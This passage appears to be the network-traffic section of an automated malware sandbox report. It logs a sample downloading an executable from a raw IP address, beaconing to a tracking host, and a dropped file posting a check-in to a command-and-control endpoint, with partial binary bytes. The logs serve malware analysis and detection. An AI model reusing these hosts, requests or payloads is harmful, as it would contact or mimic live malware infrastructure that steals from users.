                                                                                                  Jan 5, 2025 08:55:04.762444019 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762465954 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762484074 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762489080 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.762495995 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762509108 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762517929 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.762521029 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762536049 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762545109 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.762548923 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762562037 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762574911 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.762595892 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.762604952 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762619972 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.762645960 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.762693882 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762720108 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762732029 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762748003 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762758970 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762763023 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.762770891 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762782097 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.762787104 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.762805939 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.762818098 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:06.420610905 CET49712443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:06.420669079 CET44349712104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:06.420782089 CET49712443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:06.422218084 CET49712443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:06.422234058 CET44349712104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:06.910686016 CET44349712104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:06.910758972 CET49712443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:06.912389040 CET49712443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:06.912403107 CET44349712104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:06.912647963 CET44349712104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:06.961380959 CET49712443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:06.961406946 CET49712443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:06.961464882 CET44349712104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:07.396183968 CET44349712104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:07.396279097 CET44349712104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:07.396344900 CET49712443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:07.398030996 CET49712443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:07.398052931 CET44349712104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:07.398062944 CET49712443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:07.398070097 CET44349712104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:07.410161018 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:07.410181046 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:07.410315037 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:07.410685062 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:07.410696030 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:07.885870934 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:07.885953903 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:07.889782906 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:07.889789104 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:07.890022039 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:07.891402006 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:07.891561031 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:07.891586065 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.367250919 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.367305994 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.367351055 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.367368937 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.367378950 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.367420912 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.367428064 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.367434025 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.367477894 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.367986917 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.368326902 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.368376970 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.368383884 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.371978998 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.372025013 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.372056007 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.372107029 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.372114897 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.372154951 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.421029091 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.457577944 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.457680941 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.457714081 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.457763910 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.457772970 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.457808971 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.457832098 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.457850933 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.470920086 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.470928907 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.470938921 CET49713443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.470943928 CET44349713104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.670932055 CET49715443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.670958996 CET44349715104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:08.671122074 CET49715443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.671468019 CET49715443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:08.671479940 CET44349715104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:09.156296015 CET44349715104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:09.156393051 CET49715443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:09.157702923 CET49715443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:09.157710075 CET44349715104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:09.157957077 CET44349715104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:09.159775019 CET49715443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:09.159905910 CET49715443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:09.159939051 CET44349715104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:09.523662090 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:09.526339054 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:09.670644045 CET44349715104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:09.670753002 CET44349715104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:09.670825005 CET49715443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:09.671000004 CET49715443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:09.671009064 CET44349715104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:09.795577049 CET49721443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:09.795594931 CET44349721104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:09.795698881 CET49721443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:09.796047926 CET49721443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:09.796060085 CET44349721104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:10.266830921 CET44349721104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:10.266983032 CET49721443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:10.268619061 CET49721443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:10.268625975 CET44349721104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:10.268872023 CET44349721104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:10.270312071 CET49721443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:10.270443916 CET49721443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:10.270478010 CET44349721104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:10.270545006 CET49721443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:10.311331034 CET44349721104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:10.783559084 CET44349721104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:10.783673048 CET44349721104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:10.783926964 CET49721443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:10.788412094 CET49721443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:10.788436890 CET44349721104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:11.336080074 CET49732443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:11.336097002 CET44349732104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:11.336199045 CET49732443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:11.336549997 CET49732443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:11.336561918 CET44349732104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:11.921489954 CET44349732104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:11.921603918 CET49732443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:11.922842026 CET49732443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:11.922849894 CET44349732104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:11.923086882 CET44349732104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:11.924410105 CET49732443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:11.924494982 CET49732443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:11.924530983 CET44349732104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:11.924629927 CET49732443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:11.924635887 CET44349732104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:12.537823915 CET44349732104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:12.537945032 CET44349732104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:12.538063049 CET49732443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:12.538187027 CET49732443192.168.2.6104.21.96.1
                                                                                                  Jan 5, 2025 08:55:12.538203955 CET44349732104.21.96.1192.168.2.6
                                                                                                  Jan 5, 2025 08:56:52.496790886 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:56:52.803831100 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:56:53.418198109 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:56:54.621305943 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:56:57.027617931 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:57:01.844101906 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:57:11.449472904 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:58:15.264210939 CET5430553192.168.2.61.1.1.1
                                                                                                  Jan 5, 2025 08:58:15.269054890 CET53543051.1.1.1192.168.2.6
                                                                                                  Jan 5, 2025 08:58:15.269117117 CET5430553192.168.2.61.1.1.1
                                                                                                  Jan 5, 2025 08:58:15.273910046 CET53543051.1.1.1192.168.2.6
                                                                                                  Jan 5, 2025 08:58:15.718533039 CET5430553192.168.2.61.1.1.1
                                                                                                  Jan 5, 2025 08:58:15.723684072 CET53543051.1.1.1192.168.2.6
                                                                                                  Jan 5, 2025 08:58:15.723826885 CET5430553192.168.2.61.1.1.1
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 5, 2025 08:55:02.526247978 CET5592053192.168.2.61.1.1.1
                                                                                                  Jan 5, 2025 08:55:02.539396048 CET53559201.1.1.1192.168.2.6
                                                                                                  Jan 5, 2025 08:55:06.404895067 CET6475453192.168.2.61.1.1.1
                                                                                                  Jan 5, 2025 08:55:06.414988041 CET53647541.1.1.1192.168.2.6
                                                                                                  Jan 5, 2025 08:58:15.263288975 CET53500401.1.1.1192.168.2.6
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Jan 5, 2025 08:55:02.526247978 CET192.168.2.61.1.1.10x5131Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:55:06.404895067 CET192.168.2.61.1.1.10xe645Standard query (0)cloudewahsj.shopA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Jan 5, 2025 08:55:02.539396048 CET1.1.1.1192.168.2.60x5131No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:55:02.539396048 CET1.1.1.1192.168.2.60x5131No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:55:06.414988041 CET1.1.1.1192.168.2.60xe645No error (0)cloudewahsj.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:55:06.414988041 CET1.1.1.1192.168.2.60xe645No error (0)cloudewahsj.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:55:06.414988041 CET1.1.1.1192.168.2.60xe645No error (0)cloudewahsj.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:55:06.414988041 CET1.1.1.1192.168.2.60xe645No error (0)cloudewahsj.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:55:06.414988041 CET1.1.1.1192.168.2.60xe645No error (0)cloudewahsj.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:55:06.414988041 CET1.1.1.1192.168.2.60xe645No error (0)cloudewahsj.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:55:06.414988041 CET1.1.1.1192.168.2.60xe645No error (0)cloudewahsj.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                                  • post-to-me.com
                                                                                                  • cloudewahsj.shop
                                                                                                  • 176.113.115.19
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.649710176.113.115.19803200C:\Users\user\Desktop\IH5XqCdf06.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 5, 2025 08:55:03.600347042 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                                  User-Agent: ShareScreen
                                                                                                  Host: 176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.280798912 CET1236INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:55:04 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Last-Modified: Sun, 05 Jan 2025 07:45:02 GMT
                                                                                                  ETag: "50a00-62af0b081a546"
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 330240
                                                                                                  Content-Type: application/x-msdos-program
                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1a 24 02 80 5e 45 6c d3 5e 45 6c d3 5e 45 6c d3 e3 0a fa d3 5f 45 6c d3 40 17 e8 d3 7b 45 6c d3 40 17 f9 d3 44 45 6c d3 40 17 ef d3 20 45 6c d3 79 83 17 d3 59 45 6c d3 5e 45 6d d3 24 45 6c d3 40 17 e6 d3 5f 45 6c d3 40 17 f8 d3 5f 45 6c d3 40 17 fd d3 5f 45 6c d3 52 69 63 68 5e 45 6c d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b0 30 64 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1c 04 00 00 52 01 00 00 00 00 00 5f 44 00 00 00 10 00 00 00 30 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 2c 5e 05 00 02 00 00 80 00 00 [TRUNCATED]
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$$^El^El^El_El@{El@DEl@ ElyYEl^Em$El@_El@_El@_ElRich^ElPEL0dfR_D0@,^<"P`x-@.textl `.data0` @.rsrc`@@
                                                                                                  Jan 5, 2025 08:55:04.280817032 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 24 04 00 32 24 04 00 46 24 04 00 5c 24 04 00 74 24 04 00 8c 24 04 00 a0 24 04 00 be 24 04 00 d2 24 04 00 ec 24 04 00 02 25
                                                                                                  Data Ascii: $2$F$\$t$$$$$$%%.%>%N%b%r%%%%%%%&& &8&H&V&f&z&&&&&^+N+8+(+J'f''''''
                                                                                                  Jan 5, 2025 08:55:04.280901909 CET1236INData Raw: cc 27 04 00 dc 27 04 00 f2 27 04 00 06 28 04 00 1a 28 04 00 26 28 04 00 34 28 04 00 40 28 04 00 4e 28 04 00 58 28 04 00 6e 28 04 00 7a 28 04 00 90 28 04 00 9c 28 04 00 b4 28 04 00 cc 28 04 00 d8 28 04 00 ea 28 04 00 f8 28 04 00 0a 29 04 00 22 29
                                                                                                  Data Ascii: '''((&(4(@(N(X(n(z(((((((()")4)J)d)~)))))))*&*2*<*H*Z*f*v********++,'&&';@~f@kk@
                                                                                                  Jan 5, 2025 08:55:04.280926943 CET224INData Raw: 65 20 66 6f 72 20 73 74 64 69 6f 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 0d 0a 00 00 00 00 52 36 30 32 35 0d 0a 2d 20 70 75 72 65 20 76 69 72 74 75 61 6c 20 66 75 6e 63 74 69 6f 6e 20 63 61 6c 6c 0d 0a 00 00 00 52 36 30 32 34 0d 0a 2d 20 6e
                                                                                                  Data Ascii: e for stdio initializationR6025- pure virtual function callR6024- not enough space for _onexit/atexit tableR6019- unable to open console deviceR6018- unexpected heap errorR6017- unexpec
                                                                                                  Jan 5, 2025 08:55:04.280936956 CET1236INData Raw: 74 65 64 20 6d 75 6c 74 69 74 68 72 65 61 64 20 6c 6f 63 6b 20 65 72 72 6f 72 0d 0a 00 00 00 00 52 36 30 31 36 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 74 68 72 65 61 64 20 64 61 74 61 0d 0a 00 0d 0a 54 68 69 73
                                                                                                  Data Ascii: ted multithread lock errorR6016- not enough space for thread dataThis application has requested the Runtime to terminate it in an unusual way.Please contact the application's support team for more information.R6009- not en
                                                                                                  Jan 5, 2025 08:55:04.281002998 CET1236INData Raw: 5f 79 6e 00 5f 79 31 00 5f 79 30 00 66 72 65 78 70 00 00 00 66 6d 6f 64 00 00 00 00 5f 68 79 70 6f 74 00 00 5f 63 61 62 73 00 00 00 6c 64 65 78 70 00 00 00 66 61 62 73 00 00 00 00 73 71 72 74 00 00 00 00 61 74 61 6e 32 00 00 00 74 61 6e 68 00 00
                                                                                                  Data Ascii: _yn_y1_y0frexpfmod_hypot_cabsldexpfabssqrtatan2tanhcoshsinhe+000~PAGAIsProcessorFeaturePresentKERNEL32
                                                                                                  Jan 5, 2025 08:55:04.281014919 CET1236INData Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 48 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 14 00 14 00 10 00 10 00
                                                                                                  Data Ascii: H
                                                                                                  Jan 5, 2025 08:55:04.281028032 CET1236INData Raw: 00 00 00 00 57 65 64 6e 65 73 64 61 79 00 00 00 54 75 65 73 64 61 79 00 4d 6f 6e 64 61 79 00 00 53 75 6e 64 61 79 00 00 53 61 74 00 46 72 69 00 54 68 75 00 57 65 64 00 54 75 65 00 4d 6f 6e 00 53 75 6e 00 53 75 6e 4d 6f 6e 54 75 65 57 65 64 54 68
                                                                                                  Data Ascii: WednesdayTuesdayMondaySundaySatFriThuWedTueMonSunSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDec1#QNAN1#INF1#IND1#SNANCONOUT$bad allocationkernel32.dllkernel32.dll00msi
                                                                                                  Jan 5, 2025 08:55:04.281038046 CET896INData Raw: 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00
                                                                                                  Data Ascii: nstructor iterator'`vector destructor iterator'`vector constructor iterator'`scalar deleting destructor'`default constructor closure'`vector deleting destructor'`vbase destructor'`string'`local static guard'`typeof
                                                                                                  Jan 5, 2025 08:55:04.281050920 CET1236INData Raw: a4 28 40 00 94 28 40 00 78 28 40 00 58 28 40 00 30 28 40 00 08 28 40 00 e0 27 40 00 b4 27 40 00 98 27 40 00 74 27 40 00 50 27 40 00 24 27 40 00 f8 26 40 00 dc 26 40 00 2a 1b 40 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: (@(@x(@X(@0(@(@'@'@'@t'@P'@$'@&@&@*@H
                                                                                                  Jan 5, 2025 08:55:04.285912037 CET1236INData Raw: 00 00 dd d8 83 c4 10 c7 45 fc ff ff ff ff 83 7d e8 08 72 0c 8b 55 d4 52 e8 c7 0c 00 00 83 c4 04 81 3d 9c bc 44 00 93 00 00 00 0f 85 88 00 00 00 56 56 ff 15 64 10 40 00 56 ff 15 8c 11 40 00 56 56 8d 85 d0 fb ff ff 50 56 56 e8 99 05 00 00 56 56 56
                                                                                                  Data Ascii: E}rUR=DVVd@V@VVPVVVVV`@VVH@VV|@VVVVVVDVVV8VEMViVDmDj@KhPVDD\@=@,D.ij


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.649709104.21.56.704433200C:\Users\user\Desktop\IH5XqCdf06.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-05 07:55:03 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                                  User-Agent: ShareScreen
                                                                                                  Host: post-to-me.com
                                                                                                  2025-01-05 07:55:03 UTC802INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:55:03 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ICjL2bdQ%2BkL07gYWfH5KanVlrT2ZQDTQsfsDwwUQAWHKW2tg0AwDU%2B3Vo9Q8xlgtwS9UHXqYiwgjWNWJMJlf0aa0RomZgwp%2FReLpv%2BFax6EjDBwlpxyjjNzluDPKXMyNgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fd1e7610bd78c99-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1946&rtt_var=756&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=728&delivery_rate=1423695&cwnd=247&unsent_bytes=0&cid=4c245d04f31c7987&ts=451&x=0"
                                                                                                  2025-01-05 07:55:03 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                  Data Ascii: 2ok
                                                                                                  2025-01-05 07:55:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.649712104.21.96.14433544C:\Users\user\AppData\Local\Temp\5734.tmp.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-05 07:55:06 UTC263OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 8
                                                                                                  Host: cloudewahsj.shop
                                                                                                  2025-01-05 07:55:06 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                  Data Ascii: act=life
                                                                                                  2025-01-05 07:55:07 UTC1123INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:55:07 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=utpkqv37gr88erjp4haqo4cf7u; expires=Thu, 01 May 2025 01:41:46 GMT; Max-Age=9999999; path=/
